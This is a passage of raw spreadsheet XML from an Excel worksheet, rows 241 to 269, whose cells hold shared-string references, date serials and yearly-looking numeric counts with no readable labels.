      <c r="V241">
        <v>483216</v>
      </c>
      <c r="W241" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="242" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A242" t="s">
        <v>4</v>
      </c>
      <c r="B242">
        <v>44467.868079178239</v>
      </c>
      <c r="C242" t="s">
        <v>2624</v>
      </c>
      <c r="D242">
        <v>101</v>
      </c>
      <c r="E242" t="s">
        <v>2625</v>
      </c>
      <c r="F242">
        <v>101</v>
      </c>
      <c r="G242" t="s">
        <v>2626</v>
      </c>
      <c r="H242" t="s">
        <v>2627</v>
      </c>
      <c r="I242" t="s">
        <v>833</v>
      </c>
      <c r="J242" t="s">
        <v>25</v>
      </c>
      <c r="K242" t="s">
        <v>25</v>
      </c>
      <c r="L242" t="s">
        <v>77</v>
      </c>
      <c r="M242" t="s">
        <v>25</v>
      </c>
      <c r="N242" t="s">
        <v>835</v>
      </c>
      <c r="Q242" t="s">
        <v>3582</v>
      </c>
      <c r="R242">
        <v>17102</v>
      </c>
      <c r="S242">
        <v>12956</v>
      </c>
      <c r="T242">
        <v>11486</v>
      </c>
      <c r="U242">
        <v>12777</v>
      </c>
      <c r="V242">
        <v>14614</v>
      </c>
      <c r="W242" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="243" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A243" t="s">
        <v>4</v>
      </c>
      <c r="B243">
        <v>44145.686774780093</v>
      </c>
      <c r="C243" t="s">
        <v>2653</v>
      </c>
      <c r="D243">
        <v>100</v>
      </c>
      <c r="E243" t="s">
        <v>2654</v>
      </c>
      <c r="F243">
        <v>100</v>
      </c>
      <c r="G243" t="s">
        <v>2655</v>
      </c>
      <c r="H243" t="s">
        <v>2656</v>
      </c>
      <c r="I243" t="s">
        <v>185</v>
      </c>
      <c r="J243" t="s">
        <v>186</v>
      </c>
      <c r="K243" t="s">
        <v>16</v>
      </c>
      <c r="L243" t="s">
        <v>83</v>
      </c>
      <c r="M243" t="s">
        <v>72</v>
      </c>
      <c r="O243" t="s">
        <v>2657</v>
      </c>
      <c r="Q243" t="s">
        <v>3583</v>
      </c>
      <c r="R243">
        <v>10360</v>
      </c>
      <c r="S243">
        <v>19388</v>
      </c>
      <c r="T243">
        <v>35277</v>
      </c>
      <c r="U243">
        <v>27024</v>
      </c>
      <c r="V243">
        <v>25480</v>
      </c>
      <c r="W243" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="244" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A244" t="s">
        <v>4</v>
      </c>
      <c r="B244">
        <v>44344.76032202546</v>
      </c>
      <c r="C244" t="s">
        <v>2659</v>
      </c>
      <c r="D244">
        <v>101</v>
      </c>
      <c r="E244" t="s">
        <v>2660</v>
      </c>
      <c r="F244">
        <v>101</v>
      </c>
      <c r="G244" t="s">
        <v>2661</v>
      </c>
      <c r="H244" t="s">
        <v>2662</v>
      </c>
      <c r="I244" t="s">
        <v>75</v>
      </c>
      <c r="J244" t="s">
        <v>236</v>
      </c>
      <c r="K244" t="s">
        <v>21</v>
      </c>
      <c r="L244" t="s">
        <v>77</v>
      </c>
      <c r="M244" t="s">
        <v>158</v>
      </c>
      <c r="N244" t="s">
        <v>159</v>
      </c>
      <c r="Q244" t="s">
        <v>3584</v>
      </c>
      <c r="R244">
        <v>32658</v>
      </c>
      <c r="S244">
        <v>31144</v>
      </c>
      <c r="T244">
        <v>28657</v>
      </c>
      <c r="U244">
        <v>30336</v>
      </c>
      <c r="V244">
        <v>32350</v>
      </c>
      <c r="W244" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="245" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A245" t="s">
        <v>4</v>
      </c>
      <c r="B245">
        <v>44425.807912835648</v>
      </c>
      <c r="C245" t="s">
        <v>2667</v>
      </c>
      <c r="D245">
        <v>130</v>
      </c>
      <c r="E245" t="s">
        <v>2668</v>
      </c>
      <c r="F245">
        <v>130</v>
      </c>
      <c r="G245" t="s">
        <v>2669</v>
      </c>
      <c r="H245" t="s">
        <v>2670</v>
      </c>
      <c r="I245" t="s">
        <v>833</v>
      </c>
      <c r="J245" t="s">
        <v>25</v>
      </c>
      <c r="K245" t="s">
        <v>25</v>
      </c>
      <c r="L245" t="s">
        <v>83</v>
      </c>
      <c r="M245" t="s">
        <v>72</v>
      </c>
      <c r="O245" t="s">
        <v>111</v>
      </c>
      <c r="Q245" t="s">
        <v>3585</v>
      </c>
      <c r="R245">
        <v>14994</v>
      </c>
      <c r="S245">
        <v>12006</v>
      </c>
      <c r="T245">
        <v>10892</v>
      </c>
      <c r="U245">
        <v>12934</v>
      </c>
      <c r="V245">
        <v>14285</v>
      </c>
      <c r="W245" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="246" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A246" t="s">
        <v>4</v>
      </c>
      <c r="B246">
        <v>44705.760514351852</v>
      </c>
      <c r="C246" t="s">
        <v>2667</v>
      </c>
      <c r="D246">
        <v>130</v>
      </c>
      <c r="E246" t="s">
        <v>2672</v>
      </c>
      <c r="F246">
        <v>100</v>
      </c>
      <c r="G246" t="s">
        <v>2673</v>
      </c>
      <c r="H246" t="s">
        <v>2674</v>
      </c>
      <c r="I246" t="s">
        <v>833</v>
      </c>
      <c r="J246" t="s">
        <v>25</v>
      </c>
      <c r="K246" t="s">
        <v>25</v>
      </c>
      <c r="L246" t="s">
        <v>83</v>
      </c>
      <c r="M246" t="s">
        <v>72</v>
      </c>
      <c r="Q246" t="s">
        <v>3585</v>
      </c>
      <c r="U246">
        <v>16</v>
      </c>
      <c r="W246" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="247" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A247" t="s">
        <v>4</v>
      </c>
      <c r="B247">
        <v>44705.760514363428</v>
      </c>
      <c r="C247" t="s">
        <v>2667</v>
      </c>
      <c r="D247">
        <v>130</v>
      </c>
      <c r="E247" t="s">
        <v>2675</v>
      </c>
      <c r="F247">
        <v>100</v>
      </c>
      <c r="G247" t="s">
        <v>2676</v>
      </c>
      <c r="H247" t="s">
        <v>2677</v>
      </c>
      <c r="I247" t="s">
        <v>833</v>
      </c>
      <c r="J247" t="s">
        <v>25</v>
      </c>
      <c r="K247" t="s">
        <v>25</v>
      </c>
      <c r="L247" t="s">
        <v>83</v>
      </c>
      <c r="M247" t="s">
        <v>72</v>
      </c>
      <c r="Q247" t="s">
        <v>3585</v>
      </c>
      <c r="W247" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="248" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A248" t="s">
        <v>4</v>
      </c>
      <c r="B248">
        <v>44705.760514374997</v>
      </c>
      <c r="C248" t="s">
        <v>2667</v>
      </c>
      <c r="D248">
        <v>130</v>
      </c>
      <c r="E248" t="s">
        <v>2678</v>
      </c>
      <c r="F248">
        <v>100</v>
      </c>
      <c r="G248" t="s">
        <v>2679</v>
      </c>
      <c r="H248" t="s">
        <v>2680</v>
      </c>
      <c r="I248" t="s">
        <v>833</v>
      </c>
      <c r="J248" t="s">
        <v>25</v>
      </c>
      <c r="K248" t="s">
        <v>25</v>
      </c>
      <c r="L248" t="s">
        <v>83</v>
      </c>
      <c r="M248" t="s">
        <v>72</v>
      </c>
      <c r="Q248" t="s">
        <v>3585</v>
      </c>
      <c r="U248">
        <v>22</v>
      </c>
      <c r="W248" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="249" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A249" t="s">
        <v>4</v>
      </c>
      <c r="B249">
        <v>44244.45290877315</v>
      </c>
      <c r="C249" t="s">
        <v>2681</v>
      </c>
      <c r="D249">
        <v>100</v>
      </c>
      <c r="E249" t="s">
        <v>2682</v>
      </c>
      <c r="F249">
        <v>100</v>
      </c>
      <c r="G249" t="s">
        <v>2683</v>
      </c>
      <c r="H249" t="s">
        <v>2684</v>
      </c>
      <c r="I249" t="s">
        <v>75</v>
      </c>
      <c r="J249" t="s">
        <v>236</v>
      </c>
      <c r="K249" t="s">
        <v>21</v>
      </c>
      <c r="L249" t="s">
        <v>77</v>
      </c>
      <c r="M249" t="s">
        <v>158</v>
      </c>
      <c r="N249" t="s">
        <v>159</v>
      </c>
      <c r="Q249" t="s">
        <v>3584</v>
      </c>
      <c r="R249">
        <v>828</v>
      </c>
      <c r="S249">
        <v>965</v>
      </c>
      <c r="T249">
        <v>956</v>
      </c>
      <c r="U249">
        <v>994</v>
      </c>
      <c r="V249">
        <v>1178</v>
      </c>
      <c r="W249" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="250" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A250" t="s">
        <v>4</v>
      </c>
      <c r="B250">
        <v>44425.867255358797</v>
      </c>
      <c r="C250" t="s">
        <v>2685</v>
      </c>
      <c r="D250">
        <v>120</v>
      </c>
      <c r="E250" t="s">
        <v>2686</v>
      </c>
      <c r="F250">
        <v>101</v>
      </c>
      <c r="G250" t="s">
        <v>2687</v>
      </c>
      <c r="H250" t="s">
        <v>2688</v>
      </c>
      <c r="I250" t="s">
        <v>75</v>
      </c>
      <c r="J250" t="s">
        <v>236</v>
      </c>
      <c r="K250" t="s">
        <v>21</v>
      </c>
      <c r="L250" t="s">
        <v>77</v>
      </c>
      <c r="M250" t="s">
        <v>158</v>
      </c>
      <c r="N250" t="s">
        <v>159</v>
      </c>
      <c r="O250" t="s">
        <v>2689</v>
      </c>
      <c r="Q250" t="s">
        <v>3586</v>
      </c>
      <c r="S250">
        <v>6</v>
      </c>
      <c r="U250">
        <v>11</v>
      </c>
      <c r="V250">
        <v>7</v>
      </c>
      <c r="W250" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="251" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A251" t="s">
        <v>4</v>
      </c>
      <c r="B251">
        <v>44522.770695590276</v>
      </c>
      <c r="C251" t="s">
        <v>2685</v>
      </c>
      <c r="D251">
        <v>120</v>
      </c>
      <c r="E251" t="s">
        <v>2691</v>
      </c>
      <c r="F251">
        <v>101</v>
      </c>
      <c r="G251" t="s">
        <v>2692</v>
      </c>
      <c r="H251" t="s">
        <v>2693</v>
      </c>
      <c r="I251" t="s">
        <v>75</v>
      </c>
      <c r="J251" t="s">
        <v>236</v>
      </c>
      <c r="K251" t="s">
        <v>21</v>
      </c>
      <c r="L251" t="s">
        <v>77</v>
      </c>
      <c r="M251" t="s">
        <v>158</v>
      </c>
      <c r="N251" t="s">
        <v>159</v>
      </c>
      <c r="O251" t="s">
        <v>2694</v>
      </c>
      <c r="Q251" t="s">
        <v>3586</v>
      </c>
      <c r="R251">
        <v>14</v>
      </c>
      <c r="W251" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="252" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A252" t="s">
        <v>4</v>
      </c>
      <c r="B252">
        <v>44749.768248969907</v>
      </c>
      <c r="C252" t="s">
        <v>2685</v>
      </c>
      <c r="D252">
        <v>120</v>
      </c>
      <c r="E252" t="s">
        <v>2695</v>
      </c>
      <c r="F252">
        <v>100</v>
      </c>
      <c r="G252" t="s">
        <v>2696</v>
      </c>
      <c r="H252" t="s">
        <v>2697</v>
      </c>
      <c r="I252" t="s">
        <v>75</v>
      </c>
      <c r="J252" t="s">
        <v>236</v>
      </c>
      <c r="K252" t="s">
        <v>21</v>
      </c>
      <c r="L252" t="s">
        <v>77</v>
      </c>
      <c r="M252" t="s">
        <v>158</v>
      </c>
      <c r="N252" t="s">
        <v>159</v>
      </c>
      <c r="O252" t="s">
        <v>2698</v>
      </c>
      <c r="Q252" t="s">
        <v>3586</v>
      </c>
      <c r="W252" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="253" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A253" t="s">
        <v>4</v>
      </c>
      <c r="B253">
        <v>44104.757099861112</v>
      </c>
      <c r="C253" t="s">
        <v>2699</v>
      </c>
      <c r="D253">
        <v>100</v>
      </c>
      <c r="E253" t="s">
        <v>2700</v>
      </c>
      <c r="F253">
        <v>200</v>
      </c>
      <c r="G253" t="s">
        <v>2701</v>
      </c>
      <c r="H253" t="s">
        <v>2702</v>
      </c>
      <c r="I253" t="s">
        <v>156</v>
      </c>
      <c r="J253" t="s">
        <v>226</v>
      </c>
      <c r="K253" t="s">
        <v>21</v>
      </c>
      <c r="L253" t="s">
        <v>77</v>
      </c>
      <c r="M253" t="s">
        <v>2703</v>
      </c>
      <c r="Q253" t="s">
        <v>1406</v>
      </c>
      <c r="W253" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="254" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A254" t="s">
        <v>4</v>
      </c>
      <c r="B254">
        <v>44594.937432523147</v>
      </c>
      <c r="C254" t="s">
        <v>2704</v>
      </c>
      <c r="D254">
        <v>230</v>
      </c>
      <c r="E254" t="s">
        <v>2705</v>
      </c>
      <c r="F254">
        <v>211</v>
      </c>
      <c r="G254" t="s">
        <v>2706</v>
      </c>
      <c r="H254" t="s">
        <v>2707</v>
      </c>
      <c r="I254" t="s">
        <v>156</v>
      </c>
      <c r="J254" t="s">
        <v>301</v>
      </c>
      <c r="K254" t="s">
        <v>21</v>
      </c>
      <c r="L254" t="s">
        <v>77</v>
      </c>
      <c r="M254" t="s">
        <v>158</v>
      </c>
      <c r="N254" t="s">
        <v>159</v>
      </c>
      <c r="O254" t="s">
        <v>111</v>
      </c>
      <c r="Q254" t="s">
        <v>3587</v>
      </c>
      <c r="R254">
        <v>2397083</v>
      </c>
      <c r="S254">
        <v>2134619</v>
      </c>
      <c r="T254">
        <v>2295891</v>
      </c>
      <c r="U254">
        <v>2492574</v>
      </c>
      <c r="V254">
        <v>3209852</v>
      </c>
      <c r="W254" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="255" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A255" t="s">
        <v>4</v>
      </c>
      <c r="B255">
        <v>44594.9374325463</v>
      </c>
      <c r="C255" t="s">
        <v>2704</v>
      </c>
      <c r="D255">
        <v>230</v>
      </c>
      <c r="E255" t="s">
        <v>2709</v>
      </c>
      <c r="F255">
        <v>113</v>
      </c>
      <c r="G255" t="s">
        <v>2710</v>
      </c>
      <c r="H255" t="s">
        <v>1074</v>
      </c>
      <c r="I255" t="s">
        <v>156</v>
      </c>
      <c r="J255" t="s">
        <v>301</v>
      </c>
      <c r="K255" t="s">
        <v>21</v>
      </c>
      <c r="L255" t="s">
        <v>77</v>
      </c>
      <c r="M255" t="s">
        <v>158</v>
      </c>
      <c r="N255" t="s">
        <v>159</v>
      </c>
      <c r="Q255" t="s">
        <v>3587</v>
      </c>
      <c r="R255">
        <v>1463983</v>
      </c>
      <c r="S255">
        <v>1734292</v>
      </c>
      <c r="T255">
        <v>1909018</v>
      </c>
      <c r="U255">
        <v>2036438</v>
      </c>
      <c r="V255">
        <v>2549187</v>
      </c>
      <c r="W255" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="256" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A256" t="s">
        <v>4</v>
      </c>
      <c r="B256">
        <v>44594.937432476851</v>
      </c>
      <c r="C256" t="s">
        <v>2704</v>
      </c>
      <c r="D256">
        <v>230</v>
      </c>
      <c r="E256" t="s">
        <v>2711</v>
      </c>
      <c r="F256">
        <v>208</v>
      </c>
      <c r="G256" t="s">
        <v>2712</v>
      </c>
      <c r="H256" t="s">
        <v>2713</v>
      </c>
      <c r="I256" t="s">
        <v>156</v>
      </c>
      <c r="J256" t="s">
        <v>301</v>
      </c>
      <c r="K256" t="s">
        <v>21</v>
      </c>
      <c r="L256" t="s">
        <v>77</v>
      </c>
      <c r="M256" t="s">
        <v>158</v>
      </c>
      <c r="N256" t="s">
        <v>159</v>
      </c>
      <c r="O256" t="s">
        <v>111</v>
      </c>
      <c r="Q256" t="s">
        <v>3587</v>
      </c>
      <c r="R256">
        <v>10150</v>
      </c>
      <c r="S256">
        <v>9127</v>
      </c>
      <c r="T256">
        <v>7619</v>
      </c>
      <c r="U256">
        <v>16554</v>
      </c>
      <c r="V256">
        <v>24847</v>
      </c>
      <c r="W256" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="257" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A257" t="s">
        <v>4</v>
      </c>
      <c r="B257">
        <v>44594.937432569444</v>
      </c>
      <c r="C257" t="s">
        <v>2704</v>
      </c>
      <c r="D257">
        <v>230</v>
      </c>
      <c r="E257" t="s">
        <v>2714</v>
      </c>
      <c r="F257">
        <v>100</v>
      </c>
      <c r="G257" t="s">
        <v>2715</v>
      </c>
      <c r="H257" t="s">
        <v>2716</v>
      </c>
      <c r="I257" t="s">
        <v>156</v>
      </c>
      <c r="J257" t="s">
        <v>301</v>
      </c>
      <c r="K257" t="s">
        <v>21</v>
      </c>
      <c r="L257" t="s">
        <v>77</v>
      </c>
      <c r="M257" t="s">
        <v>158</v>
      </c>
      <c r="N257" t="s">
        <v>159</v>
      </c>
      <c r="Q257" t="s">
        <v>3587</v>
      </c>
      <c r="U257">
        <v>167</v>
      </c>
      <c r="V257">
        <v>24904</v>
      </c>
      <c r="W257" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="258" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A258" t="s">
        <v>4</v>
      </c>
      <c r="B258">
        <v>44603.7096833912</v>
      </c>
      <c r="C258" t="s">
        <v>2717</v>
      </c>
      <c r="D258">
        <v>201</v>
      </c>
      <c r="E258" t="s">
        <v>2718</v>
      </c>
      <c r="F258">
        <v>201</v>
      </c>
      <c r="G258" t="s">
        <v>2719</v>
      </c>
      <c r="H258" t="s">
        <v>2720</v>
      </c>
      <c r="I258" t="s">
        <v>75</v>
      </c>
      <c r="J258" t="s">
        <v>236</v>
      </c>
      <c r="K258" t="s">
        <v>21</v>
      </c>
      <c r="L258" t="s">
        <v>77</v>
      </c>
      <c r="M258" t="s">
        <v>2703</v>
      </c>
      <c r="Q258" t="s">
        <v>1325</v>
      </c>
      <c r="W258" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="259" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A259" t="s">
        <v>4</v>
      </c>
      <c r="B259">
        <v>44603.709683414352</v>
      </c>
      <c r="C259" t="s">
        <v>2717</v>
      </c>
      <c r="D259">
        <v>201</v>
      </c>
      <c r="E259" t="s">
        <v>2721</v>
      </c>
      <c r="F259">
        <v>201</v>
      </c>
      <c r="G259" t="s">
        <v>2722</v>
      </c>
      <c r="H259" t="s">
        <v>2723</v>
      </c>
      <c r="I259" t="s">
        <v>75</v>
      </c>
      <c r="J259" t="s">
        <v>236</v>
      </c>
      <c r="K259" t="s">
        <v>21</v>
      </c>
      <c r="L259" t="s">
        <v>77</v>
      </c>
      <c r="M259" t="s">
        <v>2703</v>
      </c>
      <c r="Q259" t="s">
        <v>1325</v>
      </c>
      <c r="T259">
        <v>722</v>
      </c>
      <c r="U259">
        <v>303</v>
      </c>
      <c r="V259">
        <v>317</v>
      </c>
      <c r="W259" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="260" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A260" t="s">
        <v>4</v>
      </c>
      <c r="B260">
        <v>44252.689908368055</v>
      </c>
      <c r="C260" t="s">
        <v>2724</v>
      </c>
      <c r="D260">
        <v>100</v>
      </c>
      <c r="E260" t="s">
        <v>2725</v>
      </c>
      <c r="F260">
        <v>100</v>
      </c>
      <c r="G260" t="s">
        <v>2726</v>
      </c>
      <c r="H260" t="s">
        <v>2727</v>
      </c>
      <c r="I260" t="s">
        <v>75</v>
      </c>
      <c r="J260" t="s">
        <v>236</v>
      </c>
      <c r="K260" t="s">
        <v>21</v>
      </c>
      <c r="L260" t="s">
        <v>77</v>
      </c>
      <c r="M260" t="s">
        <v>158</v>
      </c>
      <c r="N260" t="s">
        <v>159</v>
      </c>
      <c r="Q260" t="s">
        <v>3588</v>
      </c>
      <c r="R260">
        <v>19235</v>
      </c>
      <c r="S260">
        <v>18368</v>
      </c>
      <c r="T260">
        <v>16361</v>
      </c>
      <c r="U260">
        <v>17012</v>
      </c>
      <c r="V260">
        <v>18560</v>
      </c>
      <c r="W260" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="261" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A261" t="s">
        <v>4</v>
      </c>
      <c r="B261">
        <v>44383.478941574074</v>
      </c>
      <c r="C261" t="s">
        <v>2729</v>
      </c>
      <c r="D261">
        <v>100</v>
      </c>
      <c r="E261" t="s">
        <v>2730</v>
      </c>
      <c r="F261">
        <v>100</v>
      </c>
      <c r="G261" t="s">
        <v>2731</v>
      </c>
      <c r="H261" t="s">
        <v>2732</v>
      </c>
      <c r="I261" t="s">
        <v>75</v>
      </c>
      <c r="J261" t="s">
        <v>236</v>
      </c>
      <c r="K261" t="s">
        <v>21</v>
      </c>
      <c r="L261" t="s">
        <v>77</v>
      </c>
      <c r="M261" t="s">
        <v>158</v>
      </c>
      <c r="N261" t="s">
        <v>159</v>
      </c>
      <c r="Q261" t="s">
        <v>3589</v>
      </c>
      <c r="S261">
        <v>7573</v>
      </c>
      <c r="T261">
        <v>1404</v>
      </c>
      <c r="U261">
        <v>4531</v>
      </c>
      <c r="V261">
        <v>19991</v>
      </c>
      <c r="W261" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="262" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A262" t="s">
        <v>4</v>
      </c>
      <c r="B262">
        <v>44375.762945532406</v>
      </c>
      <c r="C262" t="s">
        <v>2734</v>
      </c>
      <c r="D262">
        <v>101</v>
      </c>
      <c r="E262" t="s">
        <v>2735</v>
      </c>
      <c r="F262">
        <v>101</v>
      </c>
      <c r="G262" t="s">
        <v>2736</v>
      </c>
      <c r="H262" t="s">
        <v>2737</v>
      </c>
      <c r="I262" t="s">
        <v>75</v>
      </c>
      <c r="J262" t="s">
        <v>236</v>
      </c>
      <c r="K262" t="s">
        <v>21</v>
      </c>
      <c r="L262" t="s">
        <v>77</v>
      </c>
      <c r="M262" t="s">
        <v>158</v>
      </c>
      <c r="N262" t="s">
        <v>159</v>
      </c>
      <c r="O262" t="s">
        <v>2738</v>
      </c>
      <c r="Q262" t="s">
        <v>3590</v>
      </c>
      <c r="V262">
        <v>22</v>
      </c>
      <c r="W262" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="263" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A263" t="s">
        <v>4</v>
      </c>
      <c r="B263">
        <v>44375.762945567127</v>
      </c>
      <c r="C263" t="s">
        <v>2734</v>
      </c>
      <c r="D263">
        <v>101</v>
      </c>
      <c r="E263" t="s">
        <v>2740</v>
      </c>
      <c r="F263">
        <v>110</v>
      </c>
      <c r="G263" t="s">
        <v>2741</v>
      </c>
      <c r="H263" t="s">
        <v>2742</v>
      </c>
      <c r="I263" t="s">
        <v>75</v>
      </c>
      <c r="J263" t="s">
        <v>236</v>
      </c>
      <c r="K263" t="s">
        <v>21</v>
      </c>
      <c r="L263" t="s">
        <v>77</v>
      </c>
      <c r="M263" t="s">
        <v>158</v>
      </c>
      <c r="N263" t="s">
        <v>159</v>
      </c>
      <c r="O263" t="s">
        <v>2743</v>
      </c>
      <c r="Q263" t="s">
        <v>3590</v>
      </c>
      <c r="U263">
        <v>5</v>
      </c>
      <c r="W263" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="264" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A264" t="s">
        <v>4</v>
      </c>
      <c r="B264">
        <v>44312.610072280091</v>
      </c>
      <c r="C264" t="s">
        <v>2785</v>
      </c>
      <c r="D264">
        <v>110</v>
      </c>
      <c r="E264" t="s">
        <v>2786</v>
      </c>
      <c r="F264">
        <v>210</v>
      </c>
      <c r="G264" t="s">
        <v>2782</v>
      </c>
      <c r="H264" t="s">
        <v>1074</v>
      </c>
      <c r="I264" t="s">
        <v>17</v>
      </c>
      <c r="J264" t="s">
        <v>1412</v>
      </c>
      <c r="K264" t="s">
        <v>17</v>
      </c>
      <c r="L264" t="s">
        <v>83</v>
      </c>
      <c r="M264" t="s">
        <v>72</v>
      </c>
      <c r="Q264" t="s">
        <v>3591</v>
      </c>
      <c r="S264">
        <v>1</v>
      </c>
      <c r="T264">
        <v>1</v>
      </c>
      <c r="U264">
        <v>3</v>
      </c>
      <c r="V264">
        <v>2</v>
      </c>
      <c r="W264" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="265" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A265" t="s">
        <v>4</v>
      </c>
      <c r="B265">
        <v>44602.796026724536</v>
      </c>
      <c r="C265" t="s">
        <v>2785</v>
      </c>
      <c r="D265">
        <v>230</v>
      </c>
      <c r="E265" t="s">
        <v>2786</v>
      </c>
      <c r="F265">
        <v>243</v>
      </c>
      <c r="G265" t="s">
        <v>2782</v>
      </c>
      <c r="H265" t="s">
        <v>2788</v>
      </c>
      <c r="I265" t="s">
        <v>17</v>
      </c>
      <c r="J265" t="s">
        <v>1412</v>
      </c>
      <c r="K265" t="s">
        <v>17</v>
      </c>
      <c r="L265" t="s">
        <v>83</v>
      </c>
      <c r="M265" t="s">
        <v>72</v>
      </c>
      <c r="Q265" t="s">
        <v>161</v>
      </c>
      <c r="S265">
        <v>1</v>
      </c>
      <c r="T265">
        <v>1</v>
      </c>
      <c r="U265">
        <v>3</v>
      </c>
      <c r="V265">
        <v>2</v>
      </c>
      <c r="W265" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="266" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A266" t="s">
        <v>4</v>
      </c>
      <c r="B266">
        <v>44602.796026666663</v>
      </c>
      <c r="C266" t="s">
        <v>2785</v>
      </c>
      <c r="D266">
        <v>110</v>
      </c>
      <c r="E266" t="s">
        <v>2789</v>
      </c>
      <c r="F266">
        <v>100</v>
      </c>
      <c r="G266" t="s">
        <v>2790</v>
      </c>
      <c r="H266" t="s">
        <v>2791</v>
      </c>
      <c r="I266" t="s">
        <v>17</v>
      </c>
      <c r="J266" t="s">
        <v>1412</v>
      </c>
      <c r="K266" t="s">
        <v>17</v>
      </c>
      <c r="L266" t="s">
        <v>83</v>
      </c>
      <c r="M266" t="s">
        <v>72</v>
      </c>
      <c r="Q266" t="s">
        <v>3591</v>
      </c>
      <c r="S266">
        <v>125</v>
      </c>
      <c r="T266">
        <v>363</v>
      </c>
      <c r="U266">
        <v>350</v>
      </c>
      <c r="V266">
        <v>2534</v>
      </c>
      <c r="W266" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="267" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A267" t="s">
        <v>4</v>
      </c>
      <c r="B267">
        <v>44312.610072337964</v>
      </c>
      <c r="C267" t="s">
        <v>2785</v>
      </c>
      <c r="D267">
        <v>230</v>
      </c>
      <c r="E267" t="s">
        <v>2789</v>
      </c>
      <c r="F267">
        <v>203</v>
      </c>
      <c r="G267" t="s">
        <v>2790</v>
      </c>
      <c r="H267" t="s">
        <v>2791</v>
      </c>
      <c r="I267" t="s">
        <v>17</v>
      </c>
      <c r="J267" t="s">
        <v>1412</v>
      </c>
      <c r="K267" t="s">
        <v>17</v>
      </c>
      <c r="L267" t="s">
        <v>83</v>
      </c>
      <c r="M267" t="s">
        <v>72</v>
      </c>
      <c r="Q267" t="s">
        <v>161</v>
      </c>
      <c r="S267">
        <v>125</v>
      </c>
      <c r="T267">
        <v>363</v>
      </c>
      <c r="U267">
        <v>350</v>
      </c>
      <c r="V267">
        <v>2534</v>
      </c>
      <c r="W267" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="268" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A268" t="s">
        <v>4</v>
      </c>
      <c r="B268">
        <v>44602.796026597221</v>
      </c>
      <c r="C268" t="s">
        <v>2785</v>
      </c>
      <c r="D268">
        <v>110</v>
      </c>
      <c r="E268" t="s">
        <v>2794</v>
      </c>
      <c r="F268">
        <v>200</v>
      </c>
      <c r="G268" t="s">
        <v>2793</v>
      </c>
      <c r="H268" t="s">
        <v>2795</v>
      </c>
      <c r="I268" t="s">
        <v>17</v>
      </c>
      <c r="J268" t="s">
        <v>1412</v>
      </c>
      <c r="K268" t="s">
        <v>17</v>
      </c>
      <c r="L268" t="s">
        <v>83</v>
      </c>
      <c r="M268" t="s">
        <v>72</v>
      </c>
      <c r="Q268" t="s">
        <v>3591</v>
      </c>
      <c r="R268">
        <v>10475</v>
      </c>
      <c r="S268">
        <v>10354</v>
      </c>
      <c r="T268">
        <v>10126</v>
      </c>
      <c r="U268">
        <v>12820</v>
      </c>
      <c r="V268">
        <v>11459</v>
      </c>
      <c r="W268" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="269" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A269" t="s">
        <v>4</v>
      </c>
      <c r="B269">
        <v>44312.610072303243</v>
      </c>
      <c r="C269" t="s">
        <v>2785</v>
      </c>
      <c r="D269">
        <v>230</v>
      </c>
      <c r="E269" t="s">
        <v>2794</v>
      </c>
      <c r="F269">
        <v>214</v>
      </c>
      <c r="G269" t="s">
        <v>2793</v>
      </c>
      <c r="H269" t="s">
        <v>1074</v>
      </c>
      <c r="I269" t="s">
        <v>17</v>
      </c>
      <c r="J269" t="s">
        <v>1412</v>
      </c>
      <c r="K269" t="s">
        <v>17</v>
      </c>
      <c r="L269" t="s">
        <v>83</v>
      </c>
      <c r="M269" t="s">
        <v>72</v>
      </c>
      <c r="Q269" t="s">
        <v>161</v>
      </c>
      <c r="R269">
        <v>10475</v>
      </c>
      <c r="S269">
        <v>10354</v>
      </c>
